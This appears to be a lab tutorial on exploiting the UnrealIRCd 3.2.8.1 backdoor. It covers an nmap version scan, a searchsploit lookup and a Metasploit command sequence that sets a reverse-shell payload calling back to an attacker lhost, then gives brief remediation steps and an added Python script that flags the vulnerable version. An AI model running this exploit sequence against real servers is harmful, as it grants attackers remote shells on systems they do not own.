6-25 Vulnerability Exploitation - irc Backdoor Exploitation
2022-08-02 01:37:00 【Mountain Rabbit 1】
Introduction to irc
IRC is the abbreviation of Internet Relay Chat. It is a network chat protocol pioneered by the Finn Jarkko Oikarinen in 1988. After ten years of development, more than 60 countries in the world have provided IRC services. The working principle of IRC is very simple: you only need to run the client software on your PC and then connect to an IRC server over the Internet using the IRC protocol. At that point you can chat through irc. IRC is characterized by very high speed: there is almost no delay when chatting, and it uses only a small amount of bandwidth. All users can chat or whisper about a topic in a place called a "Channel". Each IRC user has a Nickname to distinguish different users.
By default, the irc server runs on port 6667.
Detect target irc
Use nmap -sV -p 6667 <IP address> to detect the target's irc version information:
nmap -sV -p 6667 192.168.42.137
You can see that the target version information is quickly detected.
msf exploits irc backdoor
Use searchsploit to find available PoCs:
searchsploit UnrealIRCd
The results show the known problems with the current software. Here we choose the Backdoor Command Execution (Metasploit) entry.
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set payload cmd/unix/reverse
show options
set lhost 192.168.42.128
exploit
Use the msf module for the irc backdoor to connect and obtain a shell.
As you can see, the detection is completed, the session is established, and we can execute any command here.
Remediation and Defense
1. Upgrade the software version
2. Replace it with other software
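
To find the servers that step 1 applies to, the version can be read from the registration replies an IRC server sends to every client. The following is an added example, not code from the original post: it parses a captured transcript (SAMPLE is constructed) and flags the version named in the module above, 3.2.8.1. The function names are hypothetical, and the numeric reply layouts follow RFC 1459/2812.

```python
import re

# Version taken from the module name on this page (unreal_ircd_3281_backdoor).
FLAGGED = (3, 2, 8, 1)

# Constructed sample: lines as a server would send them during registration.
SAMPLE = [
    ":irc.lab.example NOTICE AUTH :*** Looking up your hostname...",
    ":irc.lab.example 001 audit :Welcome to the Lab IRC Network audit",
    ":irc.lab.example 004 audit irc.lab.example Unreal3.2.8.1 iowghra lvhopsmntikr",
]

def parse_irc_line(line):
    """Split one IRC line into (prefix, command, params)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if sep:                       # text after " :" is one final parameter
        parts.append(trailing)
    if not parts:
        return prefix, "", []
    return prefix, parts[0].upper(), parts[1:]

def server_version(lines):
    """Return the version token from RPL_MYINFO (004) or RPL_VERSION (351)."""
    for line in lines:
        _, cmd, params = parse_irc_line(line)
        # 004: <nick> <servername> <version> <usermodes> <chanmodes>
        if cmd == "004" and len(params) >= 3:
            return params[2]
        # 351: <nick> <version>.<debuglevel> <server> :<comments>
        if cmd == "351" and len(params) >= 2:
            return params[1]
    return None

def classify(version):
    """Return 'flagged', 'other-unreal', 'not-unreal' or 'unknown'."""
    if version is None:
        return "unknown"
    m = re.match(r"(?i)unreal(?:ircd-)?(\d+(?:\.\d+)*)", version)
    if not m:
        return "not-unreal"
    nums = tuple(int(p) for p in m.group(1).split("."))
    return "flagged" if nums == FLAGGED else "other-unreal"

if __name__ == "__main__":
    print(classify(server_version(SAMPLE)))
```

A "flagged" result marks the server for the upgrade or replacement listed above; the version string alone does not prove which build is installed.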